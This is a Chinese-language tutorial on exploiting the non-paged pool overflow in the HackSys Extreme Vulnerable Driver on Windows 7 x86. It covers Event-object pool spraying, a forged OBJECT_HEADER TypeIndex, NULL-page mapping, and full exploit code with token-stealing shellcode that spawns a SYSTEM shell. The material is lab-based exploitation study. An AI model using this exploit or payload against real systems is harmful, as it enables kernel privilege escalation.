作者selph

前言

窺探Ring0漏洞世界：緩沖區(qū)溢出之池溢出

實驗環(huán)境：

?虛擬機：Windows 7 x86

?物理機：Windows 10 x64

?軟件：IDA，Windbg，VS2022

漏洞分析

本次實驗內(nèi)容是PoolOverflow，IRP分發(fā)函數(shù)通過跳轉(zhuǎn)表進(jìn)行跳轉(zhuǎn)，兩項之間的控制碼相差4，所以本次實驗使用的控制碼是：0x22200f，漏洞觸發(fā)代碼：

int __stdcall TriggerBufferOverflowNonPagedPool(void *UserBuffer, unsigned int Size)
{
PVOID PoolWithTag; // ebx

?_DbgPrintEx(0x4Du, 3u, "[+] Allocating Pool chunk\n");
? PoolWithTag = ExAllocatePoolWithTag(NonPagedPool, 0x1F8u, 'kcaH');//?申請非分頁池內(nèi)存
? if ( PoolWithTag )???????????????????????????//?申請成功打印相關(guān)信息
? {
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Type: %s\n", "NonPagedPool");
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Size: 0x%zX\n", 0x1F8u);
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
???ProbeForRead(UserBuffer, 0x1F8u, 1u);?????? //?確保輸入?yún)?shù)地址可讀
???_DbgPrintEx(0x4Du, 3u, "[+] UserBuffer: 0x%p\n", UserBuffer);
???_DbgPrintEx(0x4Du, 3u, "[+] UserBuffer Size: 0x%zX\n", Size);
???_DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer: 0x%p\n", PoolWithTag);
???_DbgPrintEx(0x4Du, 3u, "[+] KernelBuffer Size: 0x%zX\n", 0x1F8u);
???_DbgPrintEx(0x4Du, 3u, "[+] Triggering Buffer Overflow in NonPagedPool\n");
???memcpy(PoolWithTag, UserBuffer, Size);????? //?復(fù)制輸入?yún)?shù)到申請的內(nèi)存里
???_DbgPrintEx(0x4Du, 3u, "[+] Freeing Pool chunk\n");
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Tag: %s\n", "'kcaH'");
???_DbgPrintEx(0x4Du, 3u, "[+] Pool Chunk: 0x%p\n", PoolWithTag);
???ExFreePoolWithTag(PoolWithTag, 'kcaH');???? //?釋放內(nèi)存
???return 0;
? }
? else
? {
???_DbgPrintEx(0x4Du, 3u, "[-] Unable to allocate Pool chunk\n");
???return 0xC0000017;
? }
}

乍看之下好像沒啥問題，填充緩沖區(qū)，同時也限制大小了，仔細(xì)一看，emmm，申請內(nèi)存的大小是0x1F8字節(jié)，復(fù)制的時候復(fù)制大小來自用戶輸入，是個經(jīng)典的緩沖區(qū)溢出，不過緩沖區(qū)是位于非分頁池內(nèi)存

漏洞利用

池風(fēng)水

內(nèi)核池類似于用戶層的堆，也是用來動態(tài)分配內(nèi)存的。因為是動態(tài)分配，所以分配的內(nèi)存位置就會不固定，在用戶層有堆噴射這樣的技術(shù)來輔助突破動態(tài)地址，這里則需要在內(nèi)核里也找到一種方法來修改內(nèi)存池，以便在內(nèi)存區(qū)域精準(zhǔn)調(diào)用shellcode

本例中的程序?qū)⒂脩艟彌_區(qū)分配在了非分頁內(nèi)存池里，所以需要找到一種方法對非分頁池中的地址進(jìn)行操作以便輔助定位shellcode的執(zhí)行

Windows提供了一種Event對象，存儲在非分頁池中，使用API-CreateEventA創(chuàng)建。

根據(jù)參考資料[2]中論文的介紹，我們可知：

內(nèi)核池空閑池塊保存在一個鏈表結(jié)構(gòu)里，當(dāng)進(jìn)行申請該池的內(nèi)存的時候，會從鏈表里找到合適大小的池塊進(jìn)行分配，如果找不到，則會尋找相近大小的池塊進(jìn)行切割然后再分配；

當(dāng)空閑鏈表里有位置相鄰的空閑池塊，則會進(jìn)行合并操作，合并成一個大的池塊

通過大量申請Event對象，然后通過CloseHandle釋放一部分Event對象留出合適的空間給用戶緩沖區(qū)，那么用戶緩沖區(qū)很可能就會出現(xiàn)在我們挖出的空缺位置上，并且同時緊緊挨著一個Event對象，也就是說，可以固定讓用戶緩沖區(qū)后面緊挨著一個Event對象

這里需要創(chuàng)建兩個足夠大的Event對象數(shù)組，一個用來消耗小尺寸空閑內(nèi)存塊，一個用來挖出空缺提供給用戶緩沖區(qū)

在空出的空閑塊中，我們將有漏洞的用戶緩沖區(qū)插入，

圖示如下：（參考資料[7]）

利用原理&Event對象結(jié)構(gòu)

這里的利用方式與之前的堆溢出覆蓋堆塊鏈表指針不同，這里通過偽造對象結(jié)構(gòu)來通過堆溢出利用偽造的對象進(jìn)行執(zhí)行shellcode（一句話概括：控制緩沖區(qū)緊挨著一個Event對象，通過覆蓋偽造一個OBJECT_TYPE頭，覆蓋指向OBJECT_TYPE_INITIALIZER中的一個過程的指針，通過執(zhí)行該過程從而執(zhí)行shellcode）具體分析往下看即可

先給一個剛好大小的正常輸入看看池的情況：

#include
#include
int main()
{
ULONG UserBufferSize = 0x1f8;
??? char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
???RtlFillMemory(UserBuffer, UserBufferSize, 0x66);
?
???HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

??? ULONG WriteRet = 0;
???DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);

???return 0;
}

給內(nèi)核漏洞函數(shù)下斷點，執(zhí)行到分配緩沖區(qū)結(jié)束，查看池信息：

一共分配了0x1f8 + 0x8 = 0x200字節(jié)的空間（那8字節(jié)是32位池頭大?。畛錆M內(nèi)容則會緊接著下一個池塊頭，如果發(fā)生溢出，就會覆蓋到下一個池塊

因為可以控制的是溢出到的下一個池塊必是一個Event對象結(jié)構(gòu)，先操縱用戶緩沖區(qū)在Event對象結(jié)構(gòu)之前，然后定位該Event對象進(jìn)行查看

CreateEventAPI創(chuàng)建的Event對象大小是40個字節(jié)，正好匹配池的0x200字節(jié)大小，大量噴射Event對象，然后釋放其中8個剛好容納緩沖區(qū)，代碼：

#include
#include
int main()
{
ULONG UserBufferSize = 0x1f8;
??? char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);
???RtlFillMemory(UserBuffer, UserBufferSize, 0x66);
?
???HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

???HANDLE spray_event1[10000] = { 0 };
???HANDLE spray_event2[5000] = { 0 };
??? for (size_t i = 0; i < 9999; i++)
??? {
???????spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
??? }
??? for (size_t i = 0; i < 4999; i++)
??? {
???????spray_event2[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
??? }
??? for (size_t i = 0; i < 8; i++)
??? {
???????CloseHandle(spray_event1[i]);
??? }


??? ULONG WriteRet = 0;
???DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);

???return 0;
}

查看池信息：

這里已經(jīng)成功將緩沖區(qū)分配到了我面大量申請的內(nèi)存的空隙中，可以看到這里緊挨著下一個池塊：

接下來查看一下下一個池塊的信息：

//?池塊頭部
kd> dt nt!_POOL_HEADER 0x8685b708+1f8
?? +0x000 PreviousSize???? : 0y001000000 (0x40)
?? +0x000 PoolIndex??????? : 0y0000000 (0)
?? +0x002 BlockSize??????? : 0y000001000 (0x8)
?? +0x002 PoolType???????? : 0y0000010 (0x2)
?? +0x000 Ulong1?????????? : 0x4080040????? //?池塊頭部
?? +0x004 PoolTag????????? : 0xee657645???? //?池塊頭部
?? +0x004 AllocatorBackTraceIndex : 0x7645
?? +0x006 PoolTagHash????? : 0xee65

//?對象頭配額信息
kd> dt nt!_OBJECT_HEADER_QUOTA_INFO 0x8685b708+1f8+8
?? +0x000 PagedPoolCharge? : 0
?? +0x004 NonPagedPoolCharge : 0x40???? //?非分頁池
?? +0x008 SecurityDescriptorCharge : 0
?? +0x00c SecurityDescriptorQuotaBlock : (null)

//?對象頭部
kd> dt nt!_OBJECT_HEADER 0x8685b708+1f8+18
?? +0x000 PointerCount???? : 0n1
?? +0x004 HandleCount????? : 0n1
?? +0x004 NextToFree?????? : 0x00000001 Void
?? +0x008 Lock???????????? : _EX_PUSH_LOCK
?? +0x00c TypeIndex??????? : 0xc ''???? //?索引
?? +0x00e InfoMask???????? : 0x8 ''
?? +0x00f Flags??????????? : 0 ''
?? +0x010 ObjectCreateInfo : 0x8799cd80 _OBJECT_CREATE_INFORMATION
?? +0x010 QuotaBlockCharged : 0x8799cd80 Void
?? +0x014 SecurityDescriptor : (null)
?? +0x018 Body???????????? : _QUAD

這里的TypeIndex實際上是一個指針數(shù)組的偏移量大小，這個數(shù)組定義了每個對象的OBJECT_TYPE：

查看對象類型：

kd> dt nt!_OBJECT_TYPE 865f59c8
+0x000 TypeList???????? : _LIST_ENTRY [ 0x865f59c8 - 0x865f59c8 ]
?? +0x008 Name???????????? : _UNICODE_STRING "Event"
?? +0x010 DefaultObject??? : (null)
?? +0x014 Index??????????? : 0xc ''
?? +0x018 TotalNumberOfObjects : 0x4a14
?? +0x01c TotalNumberOfHandles : 0x4a8a
?? +0x020 HighWaterNumberOfObjects : 0x4a19
?? +0x024 HighWaterNumberOfHandles : 0x4a8f
?? +0x028 TypeInfo???????? : _OBJECT_TYPE_INITIALIZER
?? +0x078 TypeLock???????? : _EX_PUSH_LOCK
?? +0x07c Key????????????? : 0x6e657645
?? +0x080 CallbackList???? : _LIST_ENTRY [ 0x865f5a48 - 0x865f5a48 ]

對象類型名稱是Event事件對象，TypeInfo類型信息：

kd> dx -id 0,0,881fc560 -r1 (*((ntkrpamp!_OBJECT_TYPE_INITIALIZER *)0x865f59f0))
(*((ntkrpamp!_OBJECT_TYPE_INITIALIZER *)0x865f59f0))[Type: _OBJECT_TYPE_INITIALIZER]
???[+0x000] Length?????????? : 0x50 [Type: unsigned short]
???[+0x002] ObjectTypeFlags? : 0x0 [Type: unsigned char]
???[+0x002 ( 0: 0)] CaseInsensitive?: 0x0 [Type: unsigned char]
???[+0x002 ( 1: 1)] UnnamedObjectsOnly : 0x0 [Type: unsigned char]
???[+0x002 ( 2: 2)] UseDefaultObject : 0x0 [Type: unsigned char]
???[+0x002 ( 3: 3)] SecurityRequired : 0x0 [Type: unsigned char]
???[+0x002 ( 4: 4)] MaintainHandleCount : 0x0 [Type: unsigned char]
???[+0x002 ( 5: 5)] MaintainTypeList : 0x0 [Type: unsigned char]
???[+0x002 ( 6: 6)] SupportsObjectCallbacks : 0x0 [Type: unsigned char]
???[+0x004] ObjectTypeCode?? : 0x2 [Type: unsigned long]
???[+0x008] InvalidAttributes : 0x100 [Type: unsigned long]
???[+0x00c] GenericMapping?? [Type: _GENERIC_MAPPING]
???[+0x01c] ValidAccessMask? : 0x1f0003 [Type: unsigned long]
???[+0x020] RetainAccess???? : 0x0 [Type: unsigned long]
???[+0x024] PoolType???????? : NonPagedPool (0) [Type: _POOL_TYPE]
???[+0x028] DefaultPagedPoolCharge : 0x0 [Type: unsigned long]
???[+0x02c] DefaultNonPagedPoolCharge : 0x40 [Type: unsigned long]
???[+0x030] DumpProcedure??? : 0x0 : 0x0 [Type: void (*)(void *,_OBJECT_DUMP_CONTROL *)]
???[+0x034] OpenProcedure ???: 0x0 : 0x0 [Type: long (*)(_OB_OPEN_REASON,char,_EPROCESS *,void *,unsigned long *,unsigned long)]
???[+0x038] CloseProcedure?? : 0x0 : 0x0 [Type: void (*)(_EPROCESS *,void *,unsigned long,unsigned long)]
???[+0x03c] DeleteProcedure? : 0x0 : 0x0 [Type: void (*)(void *)]
???[+0x040] ParseProcedure?? : 0x0 : 0x0 [Type: long (*)(void *,void *,_ACCESS_STATE *,char,unsigned long,_UNICODE_STRING *,_UNICODE_STRING *,void *,_SECURITY_QUALITY_OF_SERVICE *,void * *)]
???[+0x044] SecurityProcedure : 0x840ab5b6 : ntkrpamp!_SeDefaultObjectMethod@36+0x0 [Type: long (*)(void *,_SECURITY_OPERATION_CODE,unsigned long *,void *,unsigned long *,void * *,_POOL_TYPE,_GENERIC_MAPPING *,char)]
???[+0x048] QueryNameProcedure : 0x0 : 0x0 [Type: long (*)(void *,unsigned char,_OBJECT_NAME_INFORMATION *,unsigned long,unsigned long *,char)]
???[+0x04c] OkayToCloseProcedure : 0x0 : 0x0 [Type: unsigned char (*)(_EPROCESS *,void *,void *,char)]

可以看到這個結(jié)構(gòu)里面后面有一些函數(shù)指針，我們可以從提供的程序中挑選以供自己使用，這里選擇0x38的CloseProcedure，這個函數(shù)會在對象被釋放的時候調(diào)用，偏移為：0x28+0x38 = 0x60，覆蓋這個指針，指向shellcode，然后釋放對象，就會調(diào)用該方法，從而執(zhí)行shellcode

那么，我們的目標(biāo)就是把TypeIndex的偏移量從0xc改成0x0，第一個指針是空指針，不被使用的，在Windows7中有一個漏洞，可以調(diào)用NtAllocateVirtualMemory來映射到NULL頁面，然后覆蓋0x60處的指針，指向shellcode地址，完成溢出覆蓋，然后接下來只需要釋放這個對象，即可完成利用

編寫EXP

完整利用代碼如下（以刪去一些不必要的打印以免看著亂）：

#include
#include

typedef NTSTATUS(WINAPI* NtAllocateVirtualMemory_t)(IN HANDLEProcessHandle,
??? IN OUT PVOID* BaseAddress,
??? IN ULONG????? ZeroBits,
??? IN OUT PULONG AllocationSize,
??? IN ULONG????? AllocationType,
??? IN ULONG????? Protect);


// Windows 7 SP1 x86 Offsets
#define KTHREAD_OFFSET???? 0x124?// nt!_KPCR.PcrbData.CurrentThread
#define EPROCESS_OFFSET??? 0x050?// nt!_KTHREAD.ApcState.Process
#define PID_OFFSET??? ?????0x0B4?// nt!_EPROCESS.UniqueProcessId
#define FLINK_OFFSET?????? 0x0B8?// nt!_EPROCESS.ActiveProcessLinks.Flink
#define TOKEN_OFFSET?????? 0x0F8?// nt!_EPROCESS.Token
#define SYSTEM_PID???????? 0x004?// SYSTEM Process PID

VOID TokenStealingPayloadWin7() {
??? // Importance of Kernel Recovery
??? __asm {
???????pushad

??????? ;獲取當(dāng)前進(jìn)程EPROCESS
???????xor eax, eax
???????mov eax, fs: [eax + KTHREAD_OFFSET]
???????mov eax, [eax + EPROCESS_OFFSET]
???????mov ecx, eax

??????? ;搜索system進(jìn)程EPROCESS
???????mov edx, SYSTEM_PID
???????SearchSystemPID :
???????mov eax, [eax + FLINK_OFFSET]
???????????sub eax, FLINK_OFFSET
???????????cmp[eax + PID_OFFSET], edx
???????????jne SearchSystemPID

???????????; token竊取
???????????mov edx, [eax + TOKEN_OFFSET]
???????????mov[ecx + TOKEN_OFFSET], edx

???????????;?環(huán)境還原?+?返回
???????????popad
???????????mov eax,1
??? }
}

BOOL MapNullPage() {
???HMODULE hNtdll;
???SIZE_T RegionSize = 0x1000;???????????// will be rounded up to the next host
?????????????????????????????????????????? // page size address boundary -> 0x2000

??? PVOID BaseAddress = (PVOID)0x00000001; // will be rounded down to the next host
????? ?????????????????????????????????????// page size address boundary -> 0x00000000

???hNtdll = GetModuleHandle(L"ntdll.dll");

??? // Grab the address of NtAllocateVirtualMemory
???NtAllocateVirtualMemory_t????NtAllocateVirtualMemory;
???NtAllocateVirtualMemory = (NtAllocateVirtualMemory_t)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");


??? // Allocate the Virtual memory
???NtAllocateVirtualMemory((HANDLE)0xFFFFFFFF,
???????&BaseAddress,
???????0,
???????&RegionSize,
???????MEM_RESERVE | MEM_COMMIT | MEM_TOP_DOWN,
???????PAGE_EXECUTE_READWRITE);

???FreeLibrary(hNtdll);

???return TRUE;
}

int main()
{

??? ULONG UserBufferSize = 0x1f8+40;
??? PVOID EopPayload = &TokenStealingPayloadWin7;

???HANDLE hDevice = ::CreateFileW(L"\\\\.\\HacksysExtremeVulnerableDriver", GENERIC_ALL, FILE_SHARE_WRITE, nullptr, OPEN_EXISTING, 0, nullptr);

??? char* UserBuffer = (char*)HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, UserBufferSize);

??? //?溢出覆蓋一整個Event對象
???RtlFillMemory(UserBuffer, UserBufferSize, 0x66);
??? PVOID Memory = NULL;
???Memory = (PVOID)((ULONG)UserBuffer + 0x1f8);
???*(PULONG)Memory = (ULONG)0x04080040;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0xee657645;
???Memory = (PVOID)((ULONG)Memory + 0x4);
??? *(PULONG)Memory = (ULONG)0x00000000;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000040;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000000;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000000;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000001;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000001;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00000000;
???Memory = (PVOID)((ULONG)Memory + 0x4);
???*(PULONG)Memory = (ULONG)0x00080000;

??? //?映射Null頁面，設(shè)置指針
???MapNullPage();
???*(PULONG)0x00000060 = (ULONG)EopPayload;

??? //?池噴射
???HANDLE spray_event1[10000] = { 0 };
???HANDLE spray_event2[5000] = { 0 };
??? for (size_t i = 0; i < 10000; i++)
??? {
???????spray_event1[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
??? }
??? for (size_t i = 0; i < 5000; i++)
??? {
???????spray_event2[i] = CreateEventA(NULL, FALSE, FALSE, NULL);
??? }

??? //?制造空缺
??? for (size_t i = 0; i < 5000; i+=16)
??? {
???????for (size_t j = 0; j < 8; j++)
??????? {
???????????CloseHandle(spray_event2[i + j]);
??????? }
??? }

??? //?觸發(fā)溢出覆蓋
??? ULONG WriteRet = 0;
???DeviceIoControl(hDevice, 0x222003 + 4 * 3, (LPVOID)UserBuffer, UserBufferSize, NULL, 0, &WriteRet, NULL);

???HeapFree(GetProcessHeap(), 0, (LPVOID)UserBuffer);
???UserBuffer = NULL;

??? //?釋放多余的對象
??? for (size_t i = 0; i < 10000; i++)
?? ?{
???????CloseHandle(spray_event1[i]);
??? }

??? for (size_t i = 8; i < 5000; i += 16)
??? {
???????for (size_t j = 0; j < 8; j++)
??????? {
???????????CloseHandle(spray_event2[i + j]);
??????? }
??? }
?
???system("pause");
???system("cmd.exe");

??? return 0;
}

效果截圖

參考資料

? [1] FuzzySecurity | Windows ExploitDev: Part 16 https://www.fuzzysecurity.com/tutorials/expDev/20.html

? [2] kernelpool-exploitation.pdf (packetstormsecurity.net) https://dl.packetstormsecurity.net/papers/general/kernelpool-exploitation.pdf

? [3] Understanding Pool Corruption Part 1 – Buffer Overflows | Microsoft Docs??

https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-1-buffer-overflows

? [4] Understanding Pool Corruption Part 2 – Special Pool for Buffer Overruns | Microsoft Docs??

https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-2-special-pool-for-buffer-overruns

? [5] Understanding Pool Corruption Part 3 – Special Pool for Double Frees | Microsoft Docs??

https://docs.microsoft.com/zh-cn/archive/blogs/ntdebugging/understanding-pool-corruption-part-3-special-pool-for-double-frees

? [6] [翻譯]Windows內(nèi)核漏洞學(xué)習(xí)-內(nèi)核池攻擊原理_Wwoc的博客-CSDN博客

https://blog.csdn.net/qq_38025365/article/details/106291907

? [7] [翻譯]# Windows 內(nèi)核 利用教程 4 池風(fēng)水 -> 池溢出-外文翻譯-看雪論壇-安全社區(qū)|安全招聘|bbs.pediy.com https://bbs.pediy.com/thread-223719.htm

? [8] CreateEventA function (synchapi.h) - Win32 apps | Microsoft Docs?

https://docs.microsoft.com/zh-cn/windows/win32/api/synchapi/nf-synchapi-createeventa?redirectedfrom=MSDN